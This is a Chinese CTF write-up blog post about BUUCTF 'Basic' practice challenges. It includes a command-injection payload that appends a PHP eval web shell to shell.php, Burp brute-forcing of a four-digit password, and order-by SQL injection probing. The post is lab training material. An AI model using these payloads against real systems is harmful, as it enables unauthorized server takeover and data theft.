buuctf basic练习题

最新推荐文章于 2023-09-14 17:30:26 发布
最新推荐文章于 2023-09-14 17:30:26 发布
阅读量180 收藏
点赞数 1
分类专栏: buuctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vage__table/article/details/131249134
版权

前言

头一次看buu上basic类型的题目,刚开始不是很懂是什么类型的题。但是做了一些以后,感觉是类似于后台rce之类的操作。水篇博客记录一下。不是

Pikachu

普通的漏洞练习平台,直接用命令执行写入shell文件。其他姿势也都可以getshell,像文件上传、sql注入之类的都行。
127.0.0.1;echo '<?php @eval($_POST["cmd"]);?>' >> shell.php
在这里插入图片描述
蚁剑连接创建的shell.php文件,拿到flag
在这里插入图片描述

LFI COURSE 1

文件包含直接默认根目录看flag
在这里插入图片描述

BRUTE 1

用户名一猜就是admin。
在这里插入图片描述

密码是提示是4位数字,那么bp开始爆破。密码格式设置如下。
在这里插入图片描述
最后爆破出6490密码,登录获得flag。
在这里插入图片描述

在这里插入图片描述

SQL COURSE 1

简单的sql注入,不过注入点不是登录,是新闻查看的位置。
在这里插入图片描述
这里可以进行注入。
?id=1 order by 1,2,3可以测出来有几个回显点。可以看到3就没有回显了,所以只有两个回显点。后面常规的爆mysql数据库、数据表、字段,获得密码。登录获得flag。
在这里插入图片描述

Tw0_Y
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023年Basic程序设计期末综合练习题二.doc
11-05
2023年Basic程序设计期末综合练习题二.doc
SQLi-LABS 1-22关(Basic Challenges) 手动注入--(缓慢更新中 12/22)
燕麦葡萄干的博客
11-18 3483
首先判断注入类型,分别使用?时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长,时间盲注多与if(expr1,expr2,expr3)结合使用,此if语句意思为:如果expr1是TRUE,则if()的返回值是expr2;进入到MySQL所在目录,我这里是D:\software\phpstudy_pro\Extensions\MySQL5.7.26\bin,目录栏直接输入cmd调出cmd终端,输入mysql -u root -p ,然后输入密码即可成功登陆数据库。
BUUCTF——Basic题解
Zichel77的博客
08-17 5569
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6213
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
buuctf Basic
自强不息
02-16 744
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
BUUCTF——Basic
计算机硕士的博客
06-16 1631
BUUCTF——Basic(详细版),包括了做题思路和详细步骤。Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1。
Small basic试题及参考答案
08-26
本资源包含的是Small Basic的学习练习试题及参考答案,对于正在学习或准备教授Small Basic的人来说,这是一个非常有价值的资料集。 试题部分通常会涵盖以下几个核心知识点: 1. **基本语法**:这可能包括变量声明...
Visual Basic 6.0 教程(练习题
10-10
Visual Basic 6.0 教程(练习题),集经验之大成。很好的资源。
Visual Basic练习习题
09-01
VB习题,大家可以下载后练习下。以便提高大家的知识能力。大家要加油哦
Visual Basic书课后习题答案
10-12
《Visual Basic书课后习题答案》是一份针对学习Visual Basic编程语言的宝贵资源,它包含了VB书中的各个章节练习题的解答。这份资料对于正在学习VB的学生来说,无疑是提高理解和实践能力的重要辅助材料。 Visual ...
BUUCTF-Basic
5L2g556F5ZWl77yf
11-08 2779
文章目录BasicLinux LabsBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1BUU SQL COURSE 1sqli-labsBUU UPLOAD COURSE 1BUU BURP COURSE 1BUU XSS COURSE 1 Basic Linux Labs ssh连接/目录下 BUU LFI COURSE 1 <?php /** * Created by PhpStorm. * User: jinzhao
BUUCTF初学解题记录——Basic
u010152530的博客
05-04 5814
目录Linux LabBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1未完待续。。。 Linux Lab # 地址和端口为示例,需要更改为动态分配后的地址和端口 ssh root@node233.buuoj.cn -p 233 # 输入默认密码123456 cat /flag.txt # 输出flag: # flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2} # 一开始以为只要大括号的内容就行了。。。
BUUCTF-Basic部分(4道)
weixin_45908624的博客
05-24 1710
buuctf
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 6212
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
BUUCTF Basic 解题记录--BUU SQL COURSE 1
weixin_43171033的博客
09-14 1812
BUUCTF Basic 解题记录--BUU SQL COURSE 1
BUUCTF Basic 持续更新
natecho的博客
12-27 3662
Linux Labs 题目:ssh 用户名:root 密码:123456 地址和端口为动态分配的。 靶机信息 解题: 按照题目建立ssh连接 登录后,可以看到根目录中有flag BUU LFI COURSE 1 题目: <?php/** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) {
BUUCTF basic BUU SQL COURSE 1
网安小趴菜
08-25 1105
BUUCTF basic BUU SQL COURSE 1
BuuCTF- Basic-BUU LFI COURSE 1
m0_53932372的博客
12-31 954
文件包含类题目,关键在于阅读代码: highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } highlight_file(FILE); 语法高亮一个文件。 isset 判断一个变量是否已设置, 即变量已被声明,且其值不为 null。 可以理解为$var = $_GET[‘var’],这样正是答案的写法: node4.buuoj.cn:81/?f
BUUCTF base 第三题Upload-Labs-Linux1比较省事的方法
weixin_45708060的博客
06-03 1428
buuctf第三题Upload-Labs-Linux1
buuctf basic
最新发布
09-24
BUUCTF Basic是一个CTF比赛的基础题目,代码中主要包含了一个名为BUU的类,该类具有两个属性:$correct和$input。在类的析构函数__destruct()中,首先将$correct赋值为uniqid()的base64编码结果。接着判断$correct和$input是否全等,如果是,则打印根目录下的flag文件。 该代码中存在一个漏洞,在反序列化unserialize($_POST['obj'])时,可以通过构造恶意的序列化字符串来绕过代码中的限制条件,从而达到执行任意代码的目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值